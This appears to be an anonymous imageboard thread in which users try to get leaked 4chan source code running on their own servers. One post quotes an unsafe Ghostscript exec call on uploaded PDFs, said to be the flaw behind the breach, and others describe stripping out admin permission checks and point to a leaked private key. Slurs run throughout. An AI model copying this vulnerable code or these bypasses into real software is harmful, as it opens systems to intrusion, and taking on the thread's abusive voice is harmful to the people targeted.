โ5379[Quote]
>>5376addendum: I'm still not sure why I can't get the board properties to change from the default "Yotsuba Image Board" or why POSTs return "Bad Request"
โ5422[Quote]
>>5321so a cache. yeah that's normal and good
โ5440[Quote]
>>5095Where's that reported posts view from btw? can't find it in the src
โ5448[Quote]
>>5440try reported_posts.php you absolute faggot
โ5450[Quote]
>>5379Hah, I can post finally! Images upload too, but I gotta fix the embedding of em on the i. subdomain.
"Bad request" was caused by a failed referal check that regxps 4chan and 4channel in imgboard.php. That's fixed now
โ5458[Quote]
>>>5440
that file isnt in the leak doe
โ5500[Quote]
So what's the best way going forward?
- 4chan switches to Vichan
- 4chan switches to JSchan
- we clean up and patch holes in OpenYotsuba and give it to Hiro on the condition that it be released under the AGLP+NIGGER license
?
I want the third option to happen. So continue working, codemonkeys.
โ5512[Quote]
>>55004cuck is still going to keep using Yotsuba most likely.
โ5523[Quote]
>>4724I'm sure the best minds over at the CIA and NSA are hard at work trying ti fix it already
โ5529[Quote]
>>4751Might not the AI's we're used to, but people have been making some wild chatbots since forums were a thing.
If a brainlet like me with ADHD and brain damage could make runescape bots that could solve random events back in 2006-2012 there almost certainly were savants out there making chatbots on sterroids that functioned similarly to LLM's today.
โ5545[Quote]
>>5529>Might not the AI's we're used toPeople frequently associates "AI" with everything that's slightly automatized since 2021. It's clearly as you say, and those were just bot performing automated tasks.
โ5552[Quote]
>>5545Even back then some of the more sophisticated runescape bots on the market could react to conversations around them in very basic ways, like greeting people who talk to them, responding accurately when people ask skill levels, etc
โ5577[Quote]
>>5466>Sadly the flyout reply window still returns a connection error.gotta add CORS headers and edit the js to use http instead of https (or host it with a ssl cert I guess)
the ubuntu guide includes the headers you need
โ5587[Quote]
>>4613 (OP)is the db in that tz file?
โ5602[Quote]
>>5587no, hackerman didn't post the db at all for some reason, not even schema for it (wonder if he just never bothered to make a full dump while he had access)
there's an AI generated schema above but it's broken in a few places, here's updated ver with some fixes
โ5605[Quote]
>>5602>(wonder if he just never bothered to make a full dump while he had access)probably big enough to be a hassle to exfil
โ5622[Quote]
it would be nice if hackerman posted a canon db schema so we can stop guessing
โ5627[Quote]
updates:
you can post now, but it's extremely glitchy and will need further work. all the fields are getting overwritten with "OpenYotsuba", which will have to be fixed
i have reenabled the delete thing in admin.php, it was commented out likely due to it being replaced with javascript. having non-javascript admin tools LE GOOD
โ5628[Quote]
isn't actually self hosting this code illegal because of muh copyright?
โ5631[Quote]
>>5628well your website needs to be hacked for anyone to prove it's stolen code :^)
โ5632[Quote]
is this code up on git anywhere? like a gitgud repo?
โ5642[Quote]
>>5632i will release the code once you can post normally
โ5671[Quote]
>>5645>2021wasn't that ghost script vulnerability reported back in like 2011 or so?
โ5677[Quote]
>>56714cuck had decades old codebase filled with vulnerabilities
โ5697[Quote]
>>5627Any plans to release?
โ5719[Quote]
>no .git history
>can't bring back peanut butter chocolate and get the rightful mini win
sad
โ5725[Quote]
>>5719pic rel
also same month they wordfiltered soy, took them a few attempts THOUGH
โ5744[Quote]
blacks
โ5749[Quote]
>>5725How hard can it be to filter one word
โ5750[Quote]
>>5749for your average 'cuck dev, nigh-impossible
โ5766[Quote]
>>5725wasted a whole hour of their life just to filter "soy" award
โ5771[Quote]
>>5300Of course it's going to be garbage if it's plebbit trying to filter all kinds of wrongthink
I'm pretty sure it would work ok for just detecting gore and porn. It's more of an issue of getting barely tech literate imageboard hosters to deal with a local model
โ5773[Quote]
>>5095where is that report panel kept? got the manager janny panel working but don't see code for that gray one anywhere
โ5774[Quote]
>>5221yes im a retard but i decided to follow the guide and ended up with a cock ton of undefined variables and indexes for auth.php and yotsuba_config.php
also, the fuck am i supposed to add into boardlist table?
โ5775[Quote]
>>5774the undefined var stuff is just slopcode, if there's no fatal errors it's fine, once you put the php.ini-production back in place they should disappear (or might need error_reporting = 0 in php.ini too)
boardlist is just board path / board name
โ5780[Quote]
posting now works properly, i just need to clean up the source tree of useless sh!t like -test files, write a guide on how to install then the first release'll be out
โ5782[Quote]
>>5645how did you get the git files? original 7z source tree doesn't have them
โ5786[Quote]
>>5775i see, i only have one fatal error for "Class 'L' not found in /www/sys.4chan.org/g/imgboard.php on line 7741"
and loading into the pages looks like this
โ5788[Quote]
wish the /banned code was included, guess it'll have to be recreated for the true experience
>>5786forgot to set short_open_tag=On in php.ini award
โ5791[Quote]
>>5790yeah but it's in the post that linked the guide THOUGH
>>5221 โ5795[Quote]
>>5791also there's a post after that with some extra apache2 fix fyi
>>5226 โ5796[Quote]
css/signin.css is kill?
with php8.2 debian12, i got to "An email containing the verification link will be sent out shortly" via the signin page, with GeoIP enabled, with HTTPS enabled, remotely, with captchas enabled and working, no authentication disabled
so far so good
also this dog raisin website just hid all replies in this thread for the last 7 hours and updated them all in the last 30 seconds
โ5798[Quote]
>>5796damn isn't even on
https://web.archive.org/web/*/https://s.4cdn.org/css/* neither
we're also missing admin_autocomplete.js too
โ5819[Quote]
>>5816make sure error_reporting is set to 0, might be whining about the undefined var slop
โ5824[Quote]
This site is unusable so an alternative is required
โ5829[Quote]
maybe this repo can be useful here
github.com/4chenz/ChanTracking0
โ5844[Quote]
>>5824looks usable to me fam
>>5829it can be
โ5845[Quote]
>>57984chin had blocked wayback machine through robots.txt, consider archive.today instead
https://archive.ph/https://s.4cdn.org/css/* โ5847[Quote]
>>5819Just checked, that ain't it
โ5850[Quote]
>>>/soy/10689784
โ5858[Quote]
>>5850>no .git>no db schemafucking
nigger โ5862[Quote]
>>5844>auto-update turns itself back on when you uncheck it>the raisin wordfilter>soyteensidk famalam, I'm only here cause I gotta be.
โ5867[Quote]
>>5862for me its
>gem is upvote<coal id downvotein that one thread about learning the lore
i am also here just to be not here later
i figured out that email is kiked to fuck and hobbyists are essentially 99.99% gatekept from having an automated system send emails, so i'm mangling the fuck out of the thing so it just shows you the code on the same page and will have a button that takes you to verification
โ5872[Quote]
>>5862Also in line replying doesn't work on mobile
โ5874[Quote]
what the fuck is "twister_captcha"?
missing files, no information online
appears 4chan uses recaptcha, hcaptcha, and its own homegrown captcha setup that the leaker omitted the entire file of.
โ5876[Quote]
>>5874he just posted it THOUGH >>>/soy/10689784
but we're missing config file entries
โ5878[Quote]
anyone working on getting reports/team running?
โ5879[Quote]
>>5260This would unironically be a solid idea now.
โ5884[Quote]
also should we try to make a image generator based on the twister captcha to render "only readable by humans" text images?
โ5890[Quote]
4chan-extras/www.4chan/prize.html says
>Checking your team…but
http://4chan.org/prize.html says
>Checking your net worth…weird
โ5892[Quote]
>>5890http://4chan.org/ads.txt also has different content as well
guess whatever server he dumped was outdated
โ5893[Quote]
adblock.txt is some obfuscated JS, what could it be doe
โ5896[Quote]
>>5894
Nice work, you plan to make use of the newly leaked material?
โ5898[Quote]
>>5897
Keep it up, you've been the real one all day with the rest of us struggling to follow along. Would you be able to make nginx rewrite and header rules by the way?
โ5899[Quote]
>>5898i use apache so it would be an .htaccess, nginxGODS will have to port it
โ5900[Quote]
mobtest.php has
> echo '<meta name="apple-itunes-app" content="app-id=1124861180, affiliate-data=4chan" />
official 4chan app? idk how to look that id up
โ5902[Quote]
in fact i haven't read the sticky in 2 days, link me all the new leaks please
โ5904[Quote]
>>5894
OP, make a GitHub (GitLab, Codeberg, etc work too) and throw it on there. Great work on the project. You are doing gods work.
โ5908[Quote]
>>5904gitlab and github are raisin, just use gitgud
โ5909[Quote]
>>5908Right, GitHub might shoah it for DMCA. Yeah in that case throw it there OP. We must continue work on this gem
โ5912[Quote]
bumping because of the new code
โ5913[Quote]
>>5894
Post it on gitflic.ru
โ5915[Quote]
>>5894
why would you want to run that dograisin on your own
make a better image board in any primitive language and it will run fine
โ5916[Quote]
>>5894
fuck ya
โ5930[Quote]
>>5911you need the font i think
โ5936[Quote]
>>>5911 (You)>you need the font i thinki think i found it here:
https://www.danceswithferrets.org/lab/gdfs/there's one where the name lines up perfectly (PCss, 8x16, Little Endian)
endianness is correct, but using imageloadfont with that, or with just font = 1 (or 2 or 3 or 4 or 5) produces these odd squares with skewed squares cut out of them instead of letters
โ5946[Quote]
>>5894
Do you mind if I put this up on GitGud? I'll make an initial commit with the leaked stuff then commit this. Happy to give you access of course.
โ5947[Quote]
>>5946i'm already working on putting it on gitgud, already created an account just have to wait for the verification email to come (i use a sh!tty email service)
โ5950[Quote]
>>5947Great news, glad to hear it
I'll port it to nginx today o algo because apache is a bitch to set up
โ5957[Quote]
>>5936AAAAAAAAAAAAA
IDENTIFIABLE LETTERS
(and they match the challenge code)
unfortunately got this by randomly commenting out and mangling the fuck out twister_captcha.php, so maybe the leaker fucked something up or he somehow got some broken test files
now to figure out why randomly commenting out a large chunk of code made it better
โ5958[Quote]
>>5953my ID keeps changing because i use a VPN
โ5974[Quote]
>>5932How well do the backend management tools compare to its competitors?
โ6026[Quote]
>>6006impressive, lets see you solve
>>5911 โ6033[Quote]
>>6026That one's easy.
>>5911โกโกโกโกโก
โ6079[Quote]
>>6072
something tells me not to try downloading that to a machine i care about, and right now i have none
how does setup work with your "release"? are there scripts (bash? something else?)? (by setup, i mean directory structuring, are you using apache2 or nginx, how are you setting that up (it's been a pain in my ass so far)?, mysql setup, etc.)
are there detailed instructions (some readme)?
if not, setting this up would be impossible for 99.99999% of people
if so, why not post the instructions here instead of locking them in a zip? (rereading, i see you do have installation instructions, but not posting them here when much more has been posted is a bit strange)
โ6083[Quote]
>>6079setup.php automatically creates required tables
โ6085[Quote]
>>6083directory structuring?
nginx vs apache? how is the nginx/apache config set up?
what did you do with the email workflow?
what will you do about the twister captcha?
is the "release" for just local toying around, with all the captchas, timers, emails (and then pass), etc., disabled and/or bypassed? (i'm trying to get as close to a 'production' version as i can)
more general point: with things like later leaks (twister), are you going to just routinely and randomly dump zip files on catbox here (seems retarded) or are you setting up something where git can be used?
โ6087[Quote]
>>6085i have changed the default config so that it works on stock servers without needing to set mod_rewrite rules
i haven't done anything related to emails and captchas, i just disabled them because i was not able to test them
twister captcha will likely be implemented, right now i'm trying to integrate the homepage files
a git repo will be created eventually
โ6091[Quote]
>>6087"it works on stock servers"?
that's extremely vague
especially since with debian12, php8.4 isn't on a stable build, only testing and unstable, so your setup script can't work with at least the "stock servers" i'm using (unless your isntructions say to build PHP8.4 from source, but now you're really stretching the "release" claim thin)
apache2 vs nginx
all the different OS' and their different setup incantations
probably some crazy bastards using windows or openbsd
which OS? which version? apache, nginx, or something else?
(i'm hoping if your .zip contains something unpleasant i can prevent a few ano- "chuds" from getting rekt, if anyone can bravely post the instructions/readme.txt from the dump, then that'd do a lot for making this not seem remarkably sketchy)
โ6093[Quote]
>>6091he probably means it works without having to configure custom rewrite paths on nginx or whatever you're using, you are just an autistic retard
โ6097[Quote]
>>6087>>6094post the instructions
โ6105[Quote]
>>4613 (OP)So these was the line of code that permanently ACK'd 'cuck
```
if( ENABLE_PDF
1 && $ext '.pdf' ) {
// create jpeg for the thumbnailer
$pdfjpeg = IMG_DIR . $tim . '.pdf.tmp';
@exec( "/usr/local/bin/gs -q -dSAFER -dNOPAUSE -dBATCH -sDEVICE=jpeg -sOutputFile=$pdfjpeg $fname" );
if( !file_exists( $pdfjpeg ) ) unlink( $fname );
$fname = $pdfjpeg;
}
```
โ6106[Quote]
>>6105these were the lines* had a stroke
โ6125[Quote]
Bring back /mlpol/
Will keep normies out
โ6126[Quote]
hope someone releases a pack that uses the OG files mostly untouched, with rewrite etc working
would be useful for pentesting, there's already 1 exploit that was posted on xitter (not linking here, do your job desuwa)
โ6134[Quote]
>>6126The ubuntu php5.6 guide lets you run it close to vanilla, only big edits you need to make are changing domains in the files & fucking with is_local_auth to bypass captcha
if you setup hosts on the actual 4chan.org domain & got twister_captcha working (or the 4chan_auser cookie raisin) maybe wouldn't even need those changes
That does use apache2 instead of nginx THOUGH so not completely 1:1, nginx files were released in new leak so maybe those could be adapted
โ6136[Quote]
>>6126planning to do this soon, i'm not liking the openyotsuba changes so far
โ6137[Quote]
>>6126when you say mostly untouched, would porting to PHP8.x break that?
so far i have a nice setup with an actual domain, https, remote server, their home brewed "twister" captcha nightmare, mod rewrite, etc. i'm accessing the page in pic rel with just
https://<foo>.com/b/admini just got the admin sign in page myself
i'm a lot more suspicious of that other anon because getting this to show up involved commenting out three things in a function that seemed to intend to stop me from finding this, AND i had to create a database table that wasn't in the leaked schemas list and whose name hasn't been mentioned in this thread once, which is real weird:
`user_actions` (so far):
- `ip` int(10) unsigned NOT NULL
- `board` varchar(10) DEFAULT NULL
- `action` varchar(50) DEFAULT NULL
- `time` TIMESTAMP
- PRIMARY KEY (`id`)
โ6138[Quote]
>>6137user_actions was in the
>>5602 sql
โ6139[Quote]
>>6137Nice. I'll be watching this thread, who knows, maybe I'll create a new chan called rUSAcan-chan allowing posting only from USa, Vanada and Russia as each country shares borders with the other 2.
โ6142[Quote]
>>6137i forgot to emphasize how much of a bitch it was to figure out those three things needed to be commented out, since they seemed critical, and without them it makes the comment about what the function is supposed to do seem incorrect
in admin.php, line 1411-ish:
> commented as "password validation" but is required to get a login form, seems disjoint> chicken and egg functions here and somewhere else that require cookies to be set in order to access admin things, fail if we don't have cookies set, but cookies are only set after this step, so logically how the fuck are cookies first set?> there's a function that if passed one truthy param will allow us to login with POST parameters, but no call of this function has a truthy param, all falsy> in adminvalid:> if we aren't already authorized: error( 'You do not have permission to access this page.' );. have to comment that out> if we aren't already authorized: admin_login_fail(); causes a different error. also causes user_access table to be interacted with. have to comment that out, since a login fail before we see the login form makes no sense (and can't use POST because we need a value to be truthy that logically never is)> if ($title !== 'Ban Request' && !has_level('mod')) { die() } # again, if not already a mod, this just halts the function before we get the login form, so comment this outafter doing that, i have the login form. finding this was a fucking labryinth
โ6147[Quote]
>>6126I'm waiting for the db schema to be leaked in order to try and run this raisin as intactly as possible with PHP5.6 + apache. Also desuwa if you're reading this just quit your job, there's no replacement for you
โ6151[Quote]
>>6142seemed like /admin was probably phased out in favor of the mod.js / janitor.js extensions, and the new team.4chan.org stuff
there's an extra_path cookie you can set to the JS name which makes it load extension when you open the board, afaik extension makes a couple XHR requests to /admin which is probably why it's still around
didn't find where extra_path gets setup though, maybe team.4chan sets it, haven't really looked at that yet
โ6158[Quote]
>ssl_certificate_key /usr/local/www/ssl/4chan.org-nopw.key
wew, leaklad has the private key without any password
โ6159[Quote]
>>6139D-6 Metro 2. Theyโre all countries that can share subway tunnels
โ6183[Quote]
i sincerely do not believe the other anon setup the admin page honestly (and working).
after ripping apart the `adminvalid` function, setting up the new database table, you then realize that there are two `auth_user` functions, one new and one old. the old one is commented out. the new one only uses new cookies, which come out of thin air (no logic puts them in place), except…
they come from the old login, which has a boolean parameter switch (true uses POST parameters (from the login form), false uses the new cookies, sort of (mangled)). again, there is nothing that calls the function with the truthy parameter (using login form), so you have to mangle `adminvalid` even more (i checked for POST parameters (had to rewrite csrf tracking here) to set that boolean).
now there's some json error, but i'm making great progress, and i can see in the error logs and with debugging my user and pass are pulling an admin level from the database (before hitting that weird json error and getting `Database Error (1-0)`). i got to change moot's name to my own, which is exciting.
TL:DR
uncomment old auth and (re?)write a lot of code to use login form to maybe get new cookies, a huge amount of work and the other chud is way too vague about all this. weird case, other chud did do all of this and is just being a niggerlicious faggot about it and won't say anything
โ6188[Quote]
>>6187actually that was reports.4chan not team
โ6190[Quote]
getting rebuildall to work finally (not really, it crashed here, but again, more "good errors" where the next steps are obvious)
json error required us to populate the ips json array in mod_users with an array of at least one ip
>>6187>grep -nr do_login<ฮต (did you write this function yourself? i don't see it in the leaked code)i'd say /admin is not "old and busted", and me with my <48 hours of PHP experience was able to find out what happened in the codebase and why (they wanted to upgrade login, did so to something not in the codebase, buried it a bit; in order to use 4chan's code, we just unbury it a bit)
if it was really "old and busted", i wouldn't be looking at a successful rebuildall message using exactly that code
โ6191[Quote]
>>6190did you not read
>>6151 ? their JS extension still makes use of /admin, but it's obvious from the work needed to fix it they aren't using that page anymore to login or anything
there's remnants you can fix up to get pic rel (thanks to their raisinty dev for commenting things instead of removing them), but the new leak includes the newer team.4chan / reports.4chan code anyway
>>5917 >>5932 โ6195[Quote]
an actually successful (maybe) rebuildall
>>6191well, call whatever i'm doing the oldschool version
both sql schema dumps have the table `blotter_messages` missing the required sql_cache field? has nobody got this far?
desu you talk like a retarded faggot gen x or boomer so i really don't read much into what you post
>it works on "stock servers">as i said /admin is old and busted>can set all of this up but can't post his instructions.txt>probably just some hindoo using inspect element โ6219[Quote]
>>6195>sql_cacheit's not a field, it's a reserved mysql keyword that tells the db whether or not to use the cache when executing this request
โ6263[Quote]
>>5160trvth nvke. You can literally make a 1:1 4chan clone using js framework much easier
โ6273[Quote]
>>6271>>6272Surprised it didn't crash
โ6323[Quote]
>>6304The subdomains are still required, no?
Oh, and out of the box, accessing catalog or imgboard still tries to redirect to 4chan.org. Admin.php doesn't.
โ6359[Quote]
>>5932Oh nice, I setup 2FA the other day so I could try the mod option to embed HTML tags in posts.
I haven't properly setup the new team/report stuff yet so I can login and get a valid token, but I'm assuming they use the same mod_users table as the main site?
I've included my PHP CLI script to encrypt and store a TOTP secret in the database for 2FA, there are more in-depth instructions at the top of the file but basically:
Set the auth_secret column in the mod_users table to BLOB or BINARY (length 64)
Generate server encryption key: mkdir /www/keys && head -c 32 /dev/urandom > /www/keys/2015_enc.key
Set permissions (if needed): chown -R www-data:www-data /www/keys && chmod 700 /www/keys && chmod 600 /www/keys/2015_enc.key
Run: apt-get install php5.6-mcrypt php5.6-mysqli
Remove .txt from the attachment file name, put it anywhere on your server.
Run: php5.6 ./write_mod_secret.php username secret
If you leave the secret blank it will generate one for you to use, put this into your 2FA client, time-based (TOTP), code/digit length 6, interval 30 seconds.
You can use
https://totp.danhersam.com if you don't have a 2FA client installed.
This will only really be useful for a fresh setup, I'm guessing that the moderators (and janitors?) will get a secret/QR code via email or on first login.
โ6361[Quote]
>>6304…my "notes" (not instructions) are maybe 50x longer so far and i don't think i'm even a tenth of the way there
did chud modify the files and then not say what they did? is there a .git in there so people can see?
for instance, you have to fix a lot of curly brace array access syntax as the first thing
setup.php doesn't exist in the leak, so right out the gate that's odd and the instructions are omitting a lot (i had thought these would be instructions to get it working in modern PHP from the leak files)
there's a huge amount of old mysql_… functions that need to be updated as well, and those changes are only scratching the surface
>>6323the redirecting is one of the first problems i found, still actually haven't really solved that and for now my test board just loop redirects into itself with the page that says "Updating index…" (but i still have stuff i need to do, so maybe that gets fixed). i would be very surprised to see how this works without using subdomains (i have mine set up with a web host), or the work to go through and make sure no subdomains are used would be monumental
>>6219see pic related, the exception i got seems to pretty explicitly expect "column 'sql_cache' in 'field list'", and adding a column with that name that matched the types of 'sql_cache' as it was used for other tables in the existing schemas (check `boardlist`) made it work, and there it is defined as type varchar(100). i don't know much, but it sounds like you are full of dried and aged grapes.
โ6385[Quote]
https://gitgud.io/GapeNewell/OpenYotsubaIf you have problems make an issue and I'll try to fix it.
โ6388[Quote]
>>6385Hey chud due to recent spam posts aren't visible to non-moderators in the first hour. Only posters who have verified their email can post immediately.
โ6394[Quote]
>>6368we're two different kind of developers then
if it looks like a field/column in a table and without adding it we get errors like we're missing a field/column in a table, and we can only get past it by adding it as if it was a field/column in a table,
then it's a field/column in a table and you can ram your documentation up your ass
i hate people who cite authority and documentation when it is simpler to describe it how it is and behaves in reality
โ6495[Quote]
>>5570is that poop he's drinking
โ6757[Quote]
>>6756i know from the nvida GPU driver source leak, the opensource community couldn't use any of it because that would be a copywrite violation, i assume the same would apply here
โ6776[Quote]
>>6738holy keyed, keep up the good work +1 upvoted
โ6780[Quote]
Is /f/ okay ? Any ideas about the code in that ?
I remember they apparently kept it up during the crappy april fools since it's apparently too much of a clusterfuck to clog and unclog, no current mod has any idea how it works
โ6789[Quote]
>>6780iirc it looked like /news/'s catalogue, never really went there though
โ6791[Quote]
>>6789It had more features, i havent opened it in what 2-3 years but i remember you could play swf animation directly
At least the board is slow enough to where the entirety of it has been archived but im worried itll be purged once all of this is over
I wonder if 4chanx will be broken for a few weeks too
โ6793[Quote]
>>6738Fine work, lad. You planning to publish your codebase at some point? I'd like to try my hand at creating an automated deployment with squashfs and VMs potentially.
โ6797[Quote]
>>6738new checkpoint: b/thread/1, no php errors (or warnings), no console errors, no missing network files (except for one pesky one for mobile)
anyone know where to find buttonfade.png? (button styling for mobile device layout i think)
had to comment out a line of code or else rebuildall was not building the board's thread.json.gz (in `function updatelog_real`; `if( !$resno && $noidx ) { return; }`, maybe i fucked up since my $resno was 0?)
also had to fix a bunch of old PHP each usages, fix cors, update gzip handler to process json as well as HTML (with the gzip handler rewrite, that was simple)
next i think is posting
>>6780it's in the list of valid boards (even /news/ is), and from the way the code looks, if you were able to open it 2-3 years ago i would be shocked if it wasn't in here somewhere.
>>6793i'm feeling greedy that everyone so far was too focused on old PHP and/or no auth/captcha and/or local-only and/or etc., and that i might be close to a dream of mine (delusion of grandeur): if i can get <?>chan running just about the way 4chan ran with few changes (besides the new PHP, backend, debian 12, etc.), and if i can capture people wanting 4chan, and if i can de facto be the next runner of 4chan, i can finally cleanse it of trannies and blacked posters (maybe apartheid them into their own place like /mlp/)
i could be retarded and slow and everyone already has this running, but it's hard to tell from this thread where everyone is at
TL:DR
where would you like the codebase deployed?
(maybe i can run my own local git hosting site if things like github will nuke me for sharing leaked code)
โ6803[Quote]
>>6797>and if i can capture people wanting 4chan, and if i can de facto be the next runner of 4chan, i can finally cleanse it of trannies and blacked posters (maybe apartheid them into their own place like /mlp/)desu I wouldn't trust 99% of people to run the next 4chan, better the devil you know
โ6808[Quote]
>>4627>Just start again at this pointIn .NET, as Satania intended.
โ6809[Quote]
>>6797Anywhere is fine for starters, I can pull a few strings to have it mirrored on some other repos for redundancy if need be.
I wouldn't say your dream of reproducing the real environment is infeasible, but for that to be less painful the first real step would be to de-hardcode references to the 4chan domains as much as possible. That has proven to be one of the most annoying parts so far.
โ6810[Quote]
>>6803that was maybe one of the easiest parts, maybe top 5 easiest
> grep -rl '4cdn' ./ | xargs sed -i 's/4cdn/FOO/g'> grep -rl '4channel' ./ | xargs sed -i 's/4channel/FOO/g'> grep -rl '4chan' ./ | xargs sed -i 's/4chan/FOO/g'<congrats, you did itgetting the gzip stuff to work in a way i understand and am happy with was probably 100x more difficult, same with my autistic fixation on unburying the old admin login page and making it work
โ6823[Quote]
>>6810Sure, if all you want is to replace one hardcoded domain with another, but actually making them configurable is something I haven't had the time to explore while fighting various errors (and lack of their displays) across different web servers and PHP combinations. At least the OpenYotsuba guy reduced the number of non-relative paths if anything. Speaking of which, that's something I personally want to get done at some point: making this goddamn mess actually portable. How the hell 4chan managed to baloon as a fork of the *single-file* Futaba to… well, this.. is beyond me.
โ6824[Quote]
<what's up with this shit?
<why do all altchans let you do reverse greentexts?
โ6827[Quote]
>>6823i'd file that under "problems that are only problems if we win already"
you're not going to have issues pointing everything at one spot unless you're getting so much traffic that that causes issues, and anything beyond 1 post a day to me is a personal victory
even then, once it becomes a problem, chances are one of the hardcoded domain subgroups is the biggest problem, and you can just fight them one at a time instead of fighting the whole hydra at once
even THEN, if i'm not retarded, i saw i could point subdomains at different IPs from the web host's DNS config, so if it's a traffic issue we have even more tools to fight that
and so it won't really be a problem until you've already got a huge amount of momentum, so it's not worth worrying about.
if the problem is that others can't configure it, then just refer them to my 3-grep solution, which can probably be made into just one grep/command, and that's very easy configuration
>>6824altchans are like altgirls and they have to be quirky because they want attention much more than they want to just be a better version of something
>shiggy<diggy>roody<poo โ6832[Quote]
>>6797The problem with jannies was lack of accountability and hidden nature of it.
There should be an open board with all bans (obviously obfuscation for 'p), ban reason & which jannie was involved.
Some sort of jannie watchdog board. If there's enough evidence of abuse of jannie power, they get the boot.
โ6846[Quote]
>>6832Jannies have nothing to do with "website culture" they couldn't care less if there were anti powertrip measures because they're literally designated to powertrip over muh anarchy imageboard
โ6881[Quote]
>>6846Great idea in theory however it will be abused by bad actors spamming and harassing to get rid of/punish their well-deserved bans. All of these community report projects end up going to hell
โ6892[Quote]
>>6881i've always wondered about the more decentralized option, but that just offsets the problem to "who will store inhuman garbage": you have "curators", people subscribe to a "curator" (jannies get paid probably breaks a lot of the cycle there). Your own personal paid janny. People pay subscriptions for all sorts of doodoo-feces, some for things like news and
(((journalist))) articles.
then the matter could be something like uploading posts to some cheap blockchain like BASE or using IPFS or some other decentralized storage thing. i think the problem that would come first from that is that if you started, say, storing posts on the EVM (insane, unreasonable, but pretend it's cheap), if people start puttin' 'p on the EVM, then ISPs and states will start just blocking the EVM, won't they? (or could that apply to BTC (even more expensive that the EVM?))
โ6896[Quote]
>>5932If you have auth setup you can just go to
https://reports.whatever/login?action=tfa and it will setup 2FA for you.
QR Codes don't work because chart.googleapis.com can't create qrcodes anymore, it can be changed to another qr gen service like
https://api.qrserver.com/v1/create-qr-code/?size=250x250&data= โ6907[Quote]
and the github repository!!??
โ6910[Quote]
these are the things that make me schizo about people showing themselves posting, but code being hard to find (devtools?)
with mysql 8.4.5, the [board_name] table schemas that are in this thread right now will not work unless you make a serious change somewhere.
`root` is a tricky little value, and in the schemas the comments are unsure about their purpose. this is odd, because there is a comment in the codebase that explicitly says
>"root" is used for archive pruning
claude guesses it's to determine pruning eligibility
in the schemas, it's listed as a timestamp type. in the codebase, i've found 3 particularly interesting values it's being set to:
>0
>now()
>"202701010000"
mysql hasn't allowed 0 as a timestamp value for about 10 years, and i'm guessing it's being used elsewhere in the codebase to check against that potential 0 value as a falsy/nullish value in conditional expressions and statements. this means you can't just change it from 0 to 1, that would break those, so it has to stay as 0
you can't really change the type to an int unsigned, as every now() would then cause a crash unless changed to unix_timestamp()
you'd also not be able to compare against 202701010000 since that's a fucking huge number for a mysql unix timestamp and on top of that, it's too big to be an unsigned int.
so you have to do one of four things:
1. keep 0, change now() to unix_timestamp(), change "202701010000" to the string of the unix_timestamp of the equivalent date, change the db type from a timestamp to an int unsigned (this is what i'm doing)
2. hamstring the security on your db to allow a 0 for a timestamp, which mysql considered to be a bad idea 10 years ago enough to default ban doing that for everyone all the time
3. use a version of mysql that's 10 years old (probably "just werks")
4. potentially set up a bomb to blow up in the codebase logic
i haven't seen anyone bring this up and it was a large enough amount of work to solve that i'm surprised about that. what options are people taking here, if they got to here?
โ6941[Quote]
>>6926it would be a good strategy to buy that domain because sometimes people put .net instead of .org.
โ6991[Quote]
Can you guys please stop saying raisin? You're killing me.
โ6993[Quote]
>>69414chan.net was the original domain IIRC
โ7005[Quote]
>>6987you are a god. revive it before their admin team can, that would be funny
โ7012[Quote]
>>6926Owner email of 4chan.net: OWNER@4chan.net.customers.whoisprivacycorp.com
whoisprivacycorp.com information:
Created2014-08-05
Updated2022-08-06
Expires2022-08-05
OwnerWhois Privacy Corp.
RegistrarInternet Domain Service BS Corp.
โ7022[Quote]
>>7012>>7010The name server 151.ns1.abovedomains.com was, however was acquired by tldregistrarsolutions, which is also the director of Whois Privacy Corp, according to the offshore leaks.
Here is their website, anyone daring to talk to them:
https://www.tldregistrarsolutions.com/ โ7031[Quote]
File: File 1.png ๐ฅ๏ธ (50.09 KB, 775x849) 13226c9dc956c48e499d19c2c39b3cf34f12b49f2c3cc70eb4f51a585a5be1790ImgOps

>>7010>Alan Adฤฑ Sahibi ฤฐlgili Kiลisii am going to milk you
โ7082[Quote]
>>>4613 (OP)
>I am not doing the work of 4chan devs for free
thats retarded, the site is pretty much run by the community
โ7110[Quote]
>>6846It's like laissez-faire capitalism it really doesn't work without a government, it's a necessary evil that needs to be put on a short leash.
โ7146[Quote]
>>4731>This. If they couldn't update it in 9 years, why should users here be the good goy that fixes it for them?To make a suitable replacement
โ7157[Quote]
>>7149>>7152DON'T USE NAMECHEAP YOU STUPID NIGGER unless you want to get taken down or doxxed
I thought this was common sense
โ7168[Quote]
>>5500vichan seems better, with Yotsuba I remember having like 10 tabs and my ram is maxed out after few hours, with vichan, it doesn't go beyond 10gb after three days now.
throw that trash to the garbage
โ7193[Quote]
>>5500>we clean up and patch holes in OpenYotsuba and give it to Hiro>give it to Hirowhy would we give that gook waste our hard work after 900 second timers and trannyjannies and allowing niggerlovers to plague all boards?
also that other guy's garbage is OpenYotsuba, and you can tell putting a codebase with massive changes up on a git host with one commit "big upload" is going to be a disaster
he can have OpenYotsuba, so far i've heard of no progress of anyone actually doing a rewrite and there's 0% chance 4chan proper can accomplish that
i'll call my take on this OpenChan; logo will be goatse
also this trash website now makes you mine crypto for them, jesus christ
โ7195[Quote]
just write your own image board software, I could do it in 3 days guaranteed and have something identical to yotsuba, this raisin is EASY, there are no good open source image boards because niggers would prefer to waste time repairing moot's dogcaca php 5 for some reason
โ7224[Quote]
>>5305>All you need to moderate are the uploaded images/files.That was tried, too many false positives
โ7237[Quote]
the limewire source code link is broken. Does anyone have the files the hacker uploaded on Wednesday?
โ7245[Quote]
>>7195You know what, that's exactly what I'm gonna do now. The one I wrote as a grad project is showing it's faults, and it's due time I start a new attempt and learn from past mistakes.
โ7307[Quote]
>>7289is this like kirito's epic weeaboo world seed
โ7313[Quote]
main board page now working!
>>7307it's a pattern that haunts my soul, generated by some very simple computation rules
if i remember correctly, it's something like
"imagine pixels in a grid, do a simple math expression with their coordinates (like pixel value = x*y), then a simple check against an arbitrary combination of bits in the pixel value is done, like 'if bit 3 and bit 7 are high/set/on/1/true, then color this pixel red/color1, otherwise color it black/color2'"
so the math and computation is very simple, but it ends up generating this fucking terrifying demon rune shape
i think the idea was that i was going to replace human languages shown on a computer screen with a made-up language whose symbols' features were made up of slices of this and other 'demon rune' shapes since such a language would be infinitely more computationally efficient to render on screen compared to modern fonts. the catch being that you have to unlearn all human language, but to me that's more of a bonus than a catch
…but that's not too related (second image is a color rendering of the bytes of some data in a function loaded by the windows loader automatically into every windows program; standard functions and whatnot)
โ7320[Quote]
>>73194chan.community is geggy
โ7329[Quote]
